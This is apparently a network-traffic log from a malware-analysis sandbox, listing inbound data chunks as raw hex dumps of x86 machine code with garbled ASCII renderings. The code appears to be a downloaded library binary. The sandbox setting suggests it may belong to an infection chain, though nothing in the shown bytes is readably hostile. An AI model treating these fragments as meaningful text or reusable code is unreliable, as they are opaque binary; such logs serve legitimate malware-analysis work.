2023-11-18 09:02:39 UTC	887	IN	Data Raw: 00 83 c4 10 8b bd 84 f8 ff ff 8b f7 8b 8d 2c fe ff ff 89 b5 b4 f8 ff ff 85 c9 74 77 33 f6 33 ff 8b 84 bd 30 fe ff ff 6a 0a 5a f7 e2 03 c6 89 84 bd 30 fe ff ff 83 d2 00 47 8b f2 3b f9 75 e1 89 b5 9c f8 ff ff 85 f6 8b b5 b4 f8 ff ff 74 42 8b 8d 2c fe ff ff 83 f9 73 73 11 8b c2 89 84 8d 30 fe ff ff ff 85 2c fe ff ff eb 26 33 c0 50 89 85 9c f6 ff ff 89 85 2c fe ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 53 50 e8 47 02 00 00 83 c4 10 8b fe 8d 85 5c fc ff ff 50 8d 85 2c fe ff ff 50 e8 e5 e9 ff ff 59 59 6a 0a 5a 3b c2 0f 85 91 00 00 00 ff 85 94 f8 ff ff 8d 77 01 8b 85 5c fc ff ff c6 07 31 89 b5 b4 f8 ff ff 85 c0 0f 84 8b 00 00 00 33 ff 8b f0 33 c9 8b 84 8d 60 fc ff ff f7 e2 6a 0a 03 c7 89 84 8d 60 fc ff ff 83 d2 00 41 8b fa 5a 3b ce 75 e1 8b b5 b4 f8 ff ff 85 Data Ascii: ,tw330jZ0G;utB,ss0,&3P,P0SPG\P,PYYjZ;w\133`j`AZ;u
2023-11-18 09:02:39 UTC	891	IN	Data Raw: 83 48 04 02 f6 c1 01 74 0c 8b 45 08 bf 91 00 00 c0 83 48 04 04 f6 c1 04 74 0c 8b 45 08 bf 8e 00 00 c0 83 48 04 08 f6 c1 08 74 0c 8b 45 08 bf 90 00 00 c0 83 48 04 10 8b 4d 08 56 8b 75 0c 8b 06 c1 e0 04 f7 d0 33 41 08 83 e0 10 31 41 08 8b 4d 08 8b 06 03 c0 f7 d0 33 41 08 83 e0 08 31 41 08 8b 4d 08 8b 06 d1 e8 f7 d0 33 41 08 83 e0 04 31 41 08 8b 4d 08 8b 06 c1 e8 03 f7 d0 33 41 08 83 e0 02 31 41 08 8b 06 8b 4d 08 c1 e8 05 f7 d0 33 41 08 23 c3 31 41 08 e8 7d 03 00 00 8b d0 f6 c2 01 74 07 8b 4d 08 83 49 0c 10 f6 c2 04 74 07 8b 45 08 83 48 0c 08 f6 c2 08 74 07 8b 45 08 83 48 0c 04 f6 c2 10 74 07 8b 45 08 83 48 0c 02 f6 c2 20 74 06 8b 45 08 09 58 0c 8b 06 b9 00 0c 00 00 23 c1 74 35 3d 00 04 00 00 74 22 3d 00 08 00 00 74 0c 3b c1 75 29 8b 45 08 83 08 03 eb 21 8b Data Ascii: HtEHtEHtEHMVu3A1AM3A1AM3A1AM3A1AM3A#1A}tMItEHtEHtEH tEX#t5=t"=t;u)E!
2023-11-18 09:02:39 UTC	895	IN	Data Raw: 0c ff 75 08 e8 6c ff ff ff 83 c4 10 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 75 15 e8 ce 10 ff ff c7 00 16 00 00 00 e8 bd 46 ff ff 83 c8 ff eb 51 8b 46 0c 57 83 cf ff c1 e8 0d a8 01 74 39 56 e8 a8 e2 ff ff 56 8b f8 e8 2e e4 ff ff 56 e8 8b 86 ff ff 50 e8 11 0b 00 00 83 c4 10 85 c0 79 05 83 cf ff eb 13 83 7e 1c 00 74 0d ff 76 1c e8 a3 38 ff ff 83 66 1c 00 59 56 e8 07 0c 00 00 59 8b c7 5f 5e 5d c3 6a 10 68 00 e1 13 10 e8 21 da fe ff 8b 75 08 89 75 e0 33 c0 85 f6 0f 95 c0 85 c0 75 15 e8 48 10 ff ff c7 00 16 00 00 00 e8 37 46 ff ff 83 c8 ff eb 3b 8b 46 0c c1 e8 0c 56 a8 01 74 08 e8 be 0b 00 00 59 eb e8 83 65 e4 00 e8 45 87 ff ff 59 83 65 fc 00 56 e8 31 ff ff ff 59 8b f0 89 75 e4 c7 45 fc fe ff ff ff e8 0b 00 00 00 8b c6 e8 01 da fe ff c3 8b 75 e4 ff 75 e0 e8 29 Data Ascii: ul]UVuuFQFWt9VV.VPy~tv8fYVY_^]jh!uu3uH7F;FVtYeEYeV1YuEuu)
2023-11-18 09:02:39 UTC	899	IN	Data Raw: da 83 d8 00 89 44 24 10 89 54 24 0c 8b 44 24 18 0b c0 7d 13 8b 54 24 14 f7 d8 f7 da 83 d8 00 89 44 24 18 89 54 24 14 0b c0 75 1b 8b 4c 24 14 8b 44 24 10 33 d2 f7 f1 8b 44 24 0c f7 f1 8b c2 33 d2 4f 79 4e eb 53 8b d8 8b 4c 24 14 8b 54 24 10 8b 44 24 0c d1 eb d1 d9 d1 ea d1 d8 0b db 75 f4 f7 f1 8b c8 f7 64 24 18 91 f7 64 24 14 03 d1 72 0e 3b 54 24 10 77 08 72 0e 3b 44 24 0c 76 08 2b 44 24 14 1b 54 24 18 2b 44 24 0c 1b 54 24 10 4f 79 07 f7 da f7 d8 83 da 00 5f 5b c2 10 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 08 8b 4c 24 10 0b c8 8b 4c 24 0c 75 09 8b 44 24 04 f7 e1 c2 10 00 53 f7 e1 8b d8 8b 44 24 08 f7 64 24 14 03 d8 8b 44 24 08 f7 e1 03 d3 5b c2 10 00 cc cc cc cc cc cc cc cc cc cc cc cc 51 8d 4c 24 08 2b c8 83 e1 0f 03 c1 1b c9 0b c1 59 e9 fa Data Ascii: D$T$D$}T$D$T$uL$D$3D$3OyNSL$T$D$ud$d$r;T$wr;D$v+D$T$+D$T$Oy_[D$L$L$uD$SD$d$D$[QL$+Y
2023-11-18 09:02:39 UTC	903	IN	Data Raw: c4 0c 8b 4d fc 33 cd e8 c7 ae fe ff 8b e5 5d c3 0f 1f 00 32 61 01 10 07 61 01 10 53 62 01 10 9d 61 01 10 cc cc cc cc 55 8b ec 83 e4 f8 83 ec 0c 53 8b 5d 10 56 8b 75 08 57 8b 0b 0f b7 41 08 83 e0 3f 0f b6 80 38 bc 13 10 48 83 f8 03 0f 87 e8 00 00 00 ff 24 85 2c 64 01 10 51 e8 57 03 0d 00 83 c4 04 dd 5c 24 10 f2 0f 10 44 24 10 e8 04 ee 0f 00 8b f8 8b da 8b cf e8 4a ef 0f 00 f2 0f 10 4c 24 10 66 0f 2e c8 9f f6 c4 44 0f 8a aa 00 00 00 53 57 56 e8 ee fc 0c 00 83 c4 0c 5f 5e 5b 8b e5 5d c3 e8 1f 7d 0d 00 52 50 56 e8 d7 fc 0c 00 83 c4 0c 5f 5e 5b 8b e5 5d c3 51 e8 e7 03 0d 00 8b f8 83 c4 04 85 ff 74 72 ff 33 e8 87 03 0d 00 83 c4 04 83 f8 08 75 63 ff 77 04 ff 37 56 e8 a4 fc 0c 00 83 c4 0c 5f 5e 5b 8b e5 5d c3 51 e8 74 01 0d 00 8b f8 83 c4 04 85 ff 74 3f ff 33 e8 Data Ascii: M3]2aaSbaUS]VuWA?8H$,dQW\$D$JL$f.DSWV_^[]}RPV_^[]Qtr3ucw7V_^[]Qtt?3
2023-11-18 09:02:39 UTC	907	IN	Data Raw: 8b c1 c1 e8 08 88 4d fb 8b ce 88 45 fa e8 70 01 00 00 8b 46 14 83 c4 04 25 f8 01 00 00 3d c0 01 00 00 74 20 6a 01 ba c0 26 13 10 8b ce e8 50 01 00 00 8b 46 14 83 c4 04 25 f8 01 00 00 3d c0 01 00 00 75 e0 6a 08 8d 55 f4 8b ce e8 32 01 00 00 83 c4 04 33 c0 8b d0 b9 03 00 00 00 83 e2 03 2b ca 8b d0 c1 ea 02 c1 e1 03 8b 14 96 d3 ea 88 54 05 e0 40 83 f8 14 72 dd 33 d2 0f 1f 84 00 00 00 00 00 0f b6 4c 15 e0 8b c1 83 e1 0f c1 e8 04 0f b6 80 30 b3 13 10 88 04 57 0f b6 81 30 b3 13 10 88 44 57 01 42 83 fa 14 72 d8 8b 4d fc c6 04 57 00 33 cd 5f 5e e8 94 9d fe ff 8b e5 5d c3 cc cc cc cc 55 8b ec 83 e4 f8 83 ec 54 a1 04 10 14 10 33 c4 89 44 24 50 8b 45 0c 56 8b 75 08 85 c0 74 4c 8d 4c 24 20 c7 44 24 08 00 00 00 00 89 4c 24 0c 8d 4d 10 51 50 8d 44 24 10 c7 44 24 18 32 Data Ascii: MEpF%=t j&PF%=ujU23+T@r3L0W0DWBrMW3_^]UT3D$PEVutLL$ D$L$MQPD$D$2
2023-11-18 09:02:39 UTC	913	IN	Data Raw: f0 03 cb 33 45 fc 33 45 b0 33 45 ac 8b 5d f8 d1 c0 89 45 b8 8b c7 33 c3 89 4d f4 33 c6 c1 c1 05 03 4d b8 81 c6 a1 eb d9 6e 03 c8 c1 cb 02 8b 45 d0 03 ca 33 45 cc 33 45 c4 33 45 b4 8b 55 f4 d1 c0 89 45 d0 8b c7 33 c2 89 4d fc c1 c1 05 33 c3 03 4d d0 03 c8 c1 ca 02 8b 45 f0 03 ce 33 45 e8 33 45 c0 33 45 ec 89 4d f4 d1 c0 81 c7 a1 eb d9 6e 8b 75 fc 89 45 f0 8b c6 33 c2 c1 c1 05 03 4d f0 33 c3 03 c8 c1 ce 02 8b 45 b8 03 cf 33 45 bc 81 c3 a1 eb d9 6e 33 45 e0 33 45 b4 8b 7d f4 d1 c0 89 45 c8 8b c6 33 c2 89 4d f8 33 c7 c1 c1 05 03 4d c8 81 c2 a1 eb d9 6e 03 c1 c1 cf 02 8b 4d d0 03 c3 33 4d e4 33 4d dc 33 4d ec 8b 5d f8 89 45 fc d1 c1 89 4d ec 8b c8 c1 c1 05 8b c3 03 4d ec 33 c6 33 c7 c1 cb 02 03 c8 81 c6 a1 eb d9 6e 8b 45 f0 03 ca 33 45 b0 33 45 d8 33 45 e0 8b Data Ascii: 3E3E3E]E3M3MnE3E3E3EUE3M3ME3E3E3EMnuE3M3E3En3E3E}E3M3MnM3M3M3M]EMM33nE3E3E3E
2023-11-18 09:02:39 UTC	917	IN	Data Raw: 83 ff 5b 75 17 8b ce e8 64 04 00 00 3c 3a 75 1a b8 64 26 13 10 5f 5e 5b 8b e5 5d c3 83 ff 5c 75 09 8b ce e8 68 04 00 00 8b f8 8b ce e8 3f 04 00 00 8b 56 2c 57 3c 2d 75 2d 6a 0a e8 60 06 00 00 8b 46 18 ff 46 04 56 ff d0 8b f8 83 c4 0c 83 ff 5c 75 09 8b ce e8 36 04 00 00 8b f8 8b 56 2c 8b ce 57 6a 0a eb 02 6a 09 e8 33 06 00 00 83 c4 08 8b ce e8 f9 03 00 00 3c 5d 74 1f 8b 46 18 56 ff d0 8b f8 83 c4 04 85 ff 0f 85 72 ff ff ff b8 8c 26 13 10 5f 5e 5b 8b e5 5d c3 ff 46 04 85 ff 74 ed 8b 4e 2c 8b 46 14 2b cb 89 0c 98 e9 a8 00 00 00 8b ce e8 b8 03 00 00 0f b6 c0 83 c0 bc 83 f8 33 77 7e 0f b6 80 dc 92 01 10 ff 24 85 bc 92 01 10 ff 46 04 b8 11 00 00 00 8b 55 f8 6a 00 50 eb 70 ff 46 04 b8 0d 00 00 00 8b 55 f8 6a 00 50 eb 60 ff 46 04 b8 0e 00 00 00 8b 55 f8 6a 00 50 Data Ascii: [ud<:ud&_^[]\uh?V,W<-u-j`FFV\u6V,Wjj3<]tFVr&_^[]FtN,F+3w~$FUjPpFUjP`FUjP
2023-11-18 09:02:39 UTC	993	IN	Data Raw: 01 7e 2c 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 ff 75 08 52 8b 51 2c e8 10 00 00 00 83 c4 08 59 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 57 8b fa 8b 56 30 3b 56 2c 77 11 03 d2 e8 58 00 00 00 85 c0 74 06 33 c0 5f 5e 5d c3 8b 56 2c 3b d7 7e 21 0f 1f 80 00 00 00 00 8b 4e 10 8a 44 11 ff 88 04 11 8b 46 14 8d 0c 90 4a 8b 41 fc 89 01 3b d7 7f e6 8b 4e 10 ff 46 2c 8a 45 08 88 04 0f 8b 4e 14 8b 45 0c 89 04 b9 8b c7 5f 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 51 53 56 8b f1 57 8b fa 8b 5e 10 e8 7a fa 05 00 85 c0 75 46 50 57 8b cb e8 2d 80 0f 00 83 c4 08 85 c0 74 36 8b 5e 14 89 46 10 e8 5b fa 05 00 85 c0 75 27 8d 04 bd 00 00 00 00 8b cb 6a 00 50 e8 06 80 0f 00 83 c4 08 85 c0 74 0f 89 46 14 33 c0 89 7e 30 5f Data Ascii: ~,_^[]UQuRQ,Y]UVWV0;V,wXt3_^]V,;~!NDFJA;NF,ENE_^]UQSVW^zuFPW-t6^F[u'jPtF3~0_
2023-11-18 09:02:39 UTC	997	IN	Data Raw: 5f 5e 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b 7d 0c 33 d2 83 ce ff c7 45 f8 ff ff ff ff 33 db 89 75 f4 8b 0f 3b ca 8b 47 04 89 4d fc 8b ca 7e 41 33 ff 0f 1f 00 8b 08 83 f9 08 7c 20 83 c1 f8 be 01 00 00 00 d3 e6 80 78 05 00 75 04 0b fe eb 0c 80 78 04 02 75 06 89 54 8d f4 0b de 42 83 c0 0c 3b 55 fc 7c d0 8b 75 f4 89 7d fc 8b 7d 0c 8b 4d fc f7 d3 85 d9 74 0c 5f 5e b8 13 00 00 00 5b 8b e5 5d c3 85 f6 79 10 c7 47 14 00 00 00 00 33 c0 5f 5e 5b 8b e5 5d c3 8b 47 10 f2 0f 10 05 f0 cc 13 10 8b 4d f8 f2 0f 11 47 28 c7 04 f0 01 00 00 00 8b 47 10 c6 44 f0 04 01 85 c9 79 10 c7 47 14 01 00 00 00 33 c0 5f 5e 5b 8b e5 5d c3 8b 47 10 c7 04 c8 02 00 00 00 8b 47 10 c6 44 c8 04 01 33 c0 c7 47 14 03 00 00 00 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc Data Ascii: _^3[]USVW}3E3u;GM~A3\| xuxuTB;U\|u}}Mt_^[]yG3_^[]GMG(GDyG3_^[]GGD3G_^[]
2023-11-18 09:02:39 UTC	1001	IN	Data Raw: 05 8b 41 10 eb 10 f6 c2 01 74 04 33 c0 eb 07 b2 01 e8 65 1c 0d 00 8d 4c 24 10 c7 44 24 10 00 00 00 00 57 51 8b d0 8d 4c 24 20 e8 4c 11 00 00 83 c4 08 8b c8 80 7c 24 2c 00 75 4a 80 7c 24 2d 00 75 58 85 c9 74 18 83 7c 24 10 00 75 07 83 7c 24 14 00 74 0a 80 49 01 08 8d 46 01 89 41 08 83 c6 02 3b f3 0f 82 72 ff ff ff 8b 4c 24 20 f6 41 01 08 74 1a 8b 51 08 8b 45 10 8b 0f 8b 14 90 e8 e8 20 0d 00 eb 15 57 e8 40 a3 0c 00 eb 0a ff 75 10 8b d7 e8 c4 27 00 00 83 c4 04 ff 74 24 20 e8 b8 61 0f 00 83 c4 04 c7 44 24 20 00 00 00 00 c7 44 24 18 00 00 00 00 c7 44 24 1c 00 00 00 00 ff 74 24 28 e8 94 61 0f 00 83 c4 04 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 24 53 8b 5d 0c 56 57 83 fb 01 0f 8c 59 01 00 00 f6 c3 01 75 3c 68 00 be 12 10 68 d4 Data Ascii: At3eL$D$WQL$ L\|$,uJ\|$-uXt\|$u\|$tIFA;rL$ AtQE W@u't$ aD$ D$D$t$(a_^[]U$S]VWYu<hh
2023-11-18 09:02:39 UTC	1005	IN	Data Raw: 44 24 0c c7 44 24 10 64 00 00 00 c7 44 24 14 00 00 00 00 66 0f 13 44 24 18 e8 48 1d 00 00 8d 4c 24 08 e8 7f 1c 00 00 8b 06 b9 00 80 00 00 5e 66 09 48 08 8b 8c 24 88 00 00 00 33 cc c6 40 0b 4a e8 2d 49 fe ff 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 53 8b 59 04 57 bf 02 00 00 00 89 4d fc 3b df 7c 3a 56 8d 04 7f 8d 34 81 8a 06 84 c0 74 10 3c 07 75 10 8b ce e8 d3 ff ff ff 8b 4d fc eb 04 80 4e 01 04 80 3e 06 72 08 8b 46 04 83 c0 02 eb 05 b8 02 00 00 00 03 f8 3b fb 7e c8 5e 5f 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 56 57 52 68 d4 22 13 10 8b f9 e8 7b 26 0f 00 8b 0f 8b f0 6a ff 6a 01 6a ff 6a ff 8b d6 c7 47 14 01 00 00 00 e8 01 0d 0d 00 56 e8 eb 50 0f 00 83 c4 1c 5f 5e 8b e5 5d c3 cc cc 55 8b ec 83 e4 f8 51 c7 04 Data Ascii: D$D$dD$fD$HL$^fH$3@J-I]UQSYWM;\|:V4t<uMN>rF;~^_[]UVWRh"{&jjjjGVP_^]UQ
2023-11-18 09:02:39 UTC	1009	IN	Data Raw: 47 04 5f 5e 5b 8b e5 5d c3 3c 74 75 4a 6a 04 68 5c 9a 12 10 51 e8 d7 78 fe ff 83 c4 0c 85 c0 0f 85 5b ff ff ff 8b 4c 24 14 0f b6 41 04 f6 80 70 5d 13 10 06 0f 85 46 ff ff ff 6a 00 6a 00 ba 01 00 00 00 8b cb e8 77 01 00 00 83 c4 08 8d 47 04 5f 5e 5b 8b e5 5d c3 3c 66 75 4a 6a 05 68 64 9a 12 10 51 e8 89 78 fe ff 83 c4 0c 85 c0 0f 85 0d ff ff ff 8b 4c 24 14 0f b6 41 05 f6 80 70 5d 13 10 06 0f 85 f8 fe ff ff 6a 00 6a 00 ba 02 00 00 00 8b cb e8 29 01 00 00 83 c4 08 8d 47 05 5f 5e 5b 8b e5 5d c3 3c 2d 74 39 3c 30 7c 04 3c 39 7e 31 3c 7d 75 0c b8 fe ff ff ff 5f 5e 5b 8b e5 5d c3 3c 5d 75 0c b8 fd ff ff ff 5f 5e 5b 8b e5 5d c3 84 c0 0f 85 a7 fe ff ff 33 c0 5f 5e 5b 8b e5 5d c3 32 e4 32 c9 3c 30 7f 1f 8d 57 01 3c 2d 74 02 8b d7 80 3c 32 30 75 10 8a 44 32 01 3c 30 Data Ascii: G_^[]<tuJjh\Qx[L$Ap]FjjwG_^[]<fuJjhdQxL$Ap]jj)G_^[]<-t9<0\|<9~1<}u_^[]<]u_^[]3_^[]22<0W<-t<20uD2<0
2023-11-18 09:02:39 UTC	1013	IN	Data Raw: 13 56 14 3b 56 0c 72 14 77 05 3b 46 08 72 0d 8b d7 8b ce e8 94 00 00 00 85 c0 75 30 8d 45 14 50 ff 75 10 8b 46 04 03 46 10 50 57 e8 6c 05 0f 00 8b 46 04 83 c4 10 03 46 10 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 99 01 46 10 11 56 14 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 53 56 8b f1 8b da 57 8b 7d 08 8b 4e 10 8b 46 14 03 cf 83 d0 00 3b 46 0c 72 14 77 05 3b 4e 08 72 0d 8b d7 8b ce e8 23 00 00 00 85 c0 75 18 8b 46 04 03 46 10 57 53 50 e8 a1 6b ff ff 83 c4 0c 01 7e 10 83 56 14 00 5f 5e 5b 5d c3 cc cc 55 8b ec 83 e4 f8 51 53 56 8b f1 33 c0 57 8b 5e 0c 8b 7e 08 3b c3 77 0e 72 04 3b d7 73 08 0f a4 fb 01 03 ff eb 09 03 fa 13 d8 83 c7 0a 13 d8 38 46 18 74 5b 38 46 19 74 0c b8 01 00 00 00 5f 5e 5b 8b e5 5d c3 e8 a6 a7 05 00 85 c0 75 75 8b c7 0b c3 74 Data Ascii: V;Vrw;Fru0EPuFFPWlFFP@u+FV_^]USVW}NF;Frw;Nr#uFFWSPk~V_^[]UQSV3W^~;wr;s8Ft[8Ft_^[]uut
2023-11-18 09:02:39 UTC	1018	IN	Data Raw: 33 c0 c7 47 20 00 00 00 00 85 f6 75 2e 85 c0 75 43 53 e8 60 6f 0c 00 8b f0 83 c4 04 33 db 85 f6 75 19 ff 77 0c ff 77 10 68 34 22 13 10 e8 85 f5 0e 00 83 c4 0c 89 47 08 8d 73 01 33 ff 53 e8 34 6f 0c 00 8b 45 0c 83 c4 04 89 38 8b c6 5f 5e 5b 8b e5 5d c3 8b c8 e8 5c 65 00 00 8b f0 89 74 24 10 85 f6 75 d6 8b 74 24 18 8d 4c 24 10 8b 46 0c 8b 40 0c c1 e0 04 83 c0 58 99 52 50 e8 c6 af 01 00 8b f8 83 c4 08 85 ff 74 2a 89 77 08 8d 57 58 89 5f 04 89 57 24 8b 4e 0c 8b 74 24 10 8b 49 0c 8d 04 ca 89 47 28 8b 45 0c 89 38 8b c6 5f 5e 5b 8b e5 5d c3 8b 74 24 10 eb 83 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 55 0c 53 56 83 cb ff 33 f6 8b 02 0b cb 57 33 ff 89 4d fc 89 45 f8 85 c0 7e 65 8b 4a 04 0b d3 0b fb 80 79 05 00 74 24 83 39 00 75 1f 8a 41 04 3c 02 Data Ascii: 3G u.uCS`o3uwwh4"Gs3S4oE8_^[]\et$ut$L$F@XRPt*wWX_W$Nt$IG(E8_^[]t$UUSV3W3ME~eJyt$9uA<
2023-11-18 09:02:39 UTC	1022	IN	Data Raw: 89 85 7c fe ff ff c7 85 80 fe ff ff 00 00 05 07 c7 85 84 fe ff ff 38 07 43 07 c7 85 88 fe ff ff 63 07 88 07 c7 85 8c fe ff ff 94 07 cb 07 c7 85 90 fe ff ff e8 07 f8 07 c7 85 94 fe ff ff 0c 08 3e 08 c7 85 98 fe ff ff 78 08 9e 08 c7 85 9c fe ff ff d8 08 ee 08 c7 85 a0 fe ff ff 28 09 4f 09 c7 85 a4 fe ff ff a8 09 b8 09 c7 85 a8 fe ff ff d4 09 24 0a c7 85 ac fe ff ff 6c 0a ac 0a c7 85 b0 fe ff ff de 0a 1a 0b c7 85 b4 fe ff ff 4e 0b 8a 0b c7 85 b8 fe ff ff a8 0b b8 0b c7 85 bc fe ff ff d4 0b 08 0d c7 85 c0 fe ff ff 80 0d 70 0e c7 85 c4 fe ff ff 80 0e 90 0e c7 85 c8 fe ff ff a0 0e b6 0e c7 85 cc fe ff ff f8 0e 38 0f c7 85 d0 fe ff ff 48 0f 58 0f c7 85 d4 fe ff ff 68 0f 80 0f c7 85 d8 fe ff ff a8 0f c8 0f c7 85 dc fe ff ff d8 0f 0a 10 c7 85 e0 fe ff ff 2a 10 4a Data Ascii: \|8Cc>x(O$lNp8HXh*J
2023-11-18 09:02:39 UTC	1025	IN	Data Raw: b6 80 7c 18 02 10 ff 24 85 60 18 02 10 83 fe 04 0f 8e 89 01 00 00 81 7c 1e fc 69 63 61 6c 0f 85 7b 01 00 00 6a 00 8d 56 fc e8 37 0d 00 00 83 c4 04 85 c0 0f 84 66 01 00 00 b8 69 63 00 00 66 89 44 1e fc 8d 46 fe 89 07 33 c0 5f 5e 5b c3 83 fe 04 0f 8e 48 01 00 00 81 7c 1e fc 6e 65 73 73 0f 85 3a 01 00 00 83 c6 fc 6a 00 8b d6 e8 f4 0c 00 00 83 c4 04 85 c0 0f 84 23 01 00 00 89 37 33 c0 5f 5e 5b c3 83 fe 05 0f 8e 12 01 00 00 b8 69 63 61 74 3b 44 1e fb 75 0b b8 65 00 00 00 3a 44 1e ff 74 1e b8 69 63 69 74 3b 44 1e fb 0f 85 ed 00 00 00 b8 69 00 00 00 3a 44 1e ff 0f 85 de 00 00 00 6a 00 8d 56 fb e8 9a 0c 00 00 83 c4 04 85 c0 0f 84 c9 00 00 00 b8 69 63 00 00 66 89 44 1e fb 8d 46 fd 89 07 33 c0 5f 5e 5b c3 83 fe 03 0f 8e ab 00 00 00 b8 66 75 00 00 66 3b 44 1e fd 0f Data Ascii: \|$`\|ical{jV7ficfDF3_^[H\|ness:j#73_^[icat;Due:Dticit;Di:DjVicfDF3_^[fuf;D
2023-11-18 09:02:39 UTC	1029	IN	Data Raw: ff ff c7 44 24 1c 01 00 00 00 eb cf 0f b6 c0 80 3c 30 00 75 06 43 e9 f5 fe ff ff 8b c3 2b 45 14 89 44 24 24 8a 03 3c 41 72 06 3c 5a 77 02 04 20 88 07 43 47 8b cb 2b 4d 14 89 4c 24 2c 3b da 0f 83 86 02 00 00 3b 7c 24 20 0f 86 97 00 00 00 8b 44 24 14 b9 02 00 00 00 f7 e9 8b f0 89 54 24 28 e8 4b 6a 05 00 85 c0 0f 85 8c 02 00 00 8b 4c 24 28 8b c6 0b c1 74 12 51 56 e8 f2 f3 0e 00 83 c4 08 89 44 24 10 8b d0 eb 06 33 d2 89 54 24 10 85 d2 0f 84 62 02 00 00 8b 75 08 8b c2 ff 74 24 14 8b 8e 80 00 00 00 2b c1 51 52 03 f8 e8 9f 2d ff ff ff b6 80 00 00 00 e8 24 f2 0e 00 8b 44 24 20 83 c4 10 8b 4c 24 14 8b 54 24 0c 03 c9 89 86 80 00 00 00 83 c0 fa 03 c1 89 4c 24 14 89 8e 84 00 00 00 89 44 24 20 8a 03 84 c0 0f 89 c5 01 00 00 0f b6 f0 43 81 fe c0 00 00 00 72 4c 0f b6 b6 Data Ascii: D$<0uC+ED$$<Ar<Zw CG+ML$,;;\|$ D$T$(KjL$(tQVD$3T$but$+QR-$D$ L$T$L$D$ CrL
2023-11-18 09:02:39 UTC	1033	IN	Data Raw: 73 18 8b 4b 04 8d 53 10 e8 0e 6b 00 00 8b d0 c7 43 08 00 00 00 00 83 c4 04 89 55 fc 85 d2 75 65 56 8b 75 08 89 16 89 56 04 8b 03 85 ff 79 2d 33 ff 39 78 0c 7e 3a 0f 1f 44 00 00 8b 53 18 8b 0c fa 01 0e 8b 4c fa 04 11 4e 04 47 8b 0b 3b 79 0c 7c e9 8b 45 fc 5e 5f 5b 8b e5 5d c3 3b 78 0c 7d 18 8b 4b 18 8b 04 f9 89 06 8b 44 f9 04 89 46 04 5e 5f 8b c2 5b 8b e5 5d c3 5e 5f b8 19 00 00 00 5b 8b e5 5d c3 5f 8b c2 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 01 53 56 57 8b 40 0c 89 45 f8 8d 45 fc 89 55 f4 ba 08 00 00 00 6a 00 50 c7 45 fc 00 00 00 00 e8 65 1d 00 00 8b 7d fc 83 c4 08 85 ff 74 5f ff 75 0c bb 01 00 00 00 ff 75 08 53 57 e8 39 0d 0c 00 57 e8 03 1f 0c 00 83 c4 14 83 f8 64 75 28 6a 00 57 e8 03 1a 0c 00 6a 00 57 8b f0 e8 29 Data Ascii: sKSkCUueVuVy-39x~:DSLNG;y\|E^_[];x}KDF^_[]^_[]_[]USVW@EEUjPEe}t_uuSW9Wdu(jWjW)
2023-11-18 09:02:39 UTC	1037	IN	Data Raw: 10 00 74 49 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 8b 74 24 28 56 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 56 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 16 50 ff 15 20 23 14 10 eb 0a ff 74 24 28 ff 15 ec 22 14 10 83 c4 04 ff 74 24 0c e8 d3 1f 0c 00 83 c4 04 85 ff 75 12 85 c0 75 10 8b cb e8 f1 01 00 00 5f 5e 5b 8b e5 5d c3 8b c7 5f 5e 5b 8b e5 5d c3 cc 55 8b ec 83 e4 f8 83 ec 08 56 57 8b f9 8b 37 c7 47 08 00 00 00 00 8b 56 08 8b 46 04 52 50 52 50 68 34 20 13 10 6a 00 ff 36 e8 a2 0c 00 00 83 c4 1c 85 c0 0f 85 b3 00 00 00 39 46 2c 74 1e ff 76 08 ff 76 04 68 68 20 13 10 50 ff 36 e8 7f 0c 00 00 83 c4 14 85 c0 0f 85 90 00 00 00 8b 4f 04 e8 dc 61 00 00 85 c0 0f 85 80 00 00 00 50 89 44 24 10 ba 09 00 00 00 8d 44 24 Data Ascii: tIAtP#t$(V")@BdBV"AtP #t$("t$uu_^[]_^[]UVW7GVFRPRPh4 j69F,tvvhh P6OaPD$D$
2023-11-18 09:02:39 UTC	1041	IN	Data Raw: 00 00 85 c0 75 6d 8b ce e8 04 57 01 00 85 c0 75 62 8b ce e8 79 b5 ff ff 85 c0 75 57 8b d7 8b ce e8 dc 92 ff ff 85 c0 75 4a 50 50 50 50 50 68 20 5a 02 10 56 6a 01 6a 01 ba ec 1c 13 10 8b cf e8 1d 19 05 00 83 c4 24 85 c0 75 28 50 50 50 50 50 68 c0 59 02 10 56 6a 01 50 ba f4 1c 13 10 8b cf e8 fc 18 05 00 83 c4 24 5f 5e 8b e5 5d c3 b8 07 00 00 00 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 53 8b 5d 08 56 57 33 ff 0f 1f 44 00 00 8b 87 30 5b 13 10 85 db 75 17 f7 d8 1b c0 85 c0 74 2d 83 c7 04 83 ff 14 72 e6 5f 5e 33 c0 5b 5d c3 85 c0 74 ed 8b f0 8b d3 2b f3 0f 1f 44 00 00 0f b6 02 0f b6 0c 16 3b c1 75 0e 85 c0 75 1c 5f 5e b8 01 00 00 00 5b 5d c3 0f b6 89 80 72 13 10 0f b6 80 80 72 13 10 2b c1 75 b3 42 eb d2 cc cc 55 8b ec 83 e4 f8 51 56 8b 75 08 ba 88 1c Data Ascii: umWubyuWuJPPPPPh ZVjj$u(PPPPPhYVjP$_^]_^]US]VW3D0[ut-r_^3[]t+D;uu_^[]rr+uBUQVu
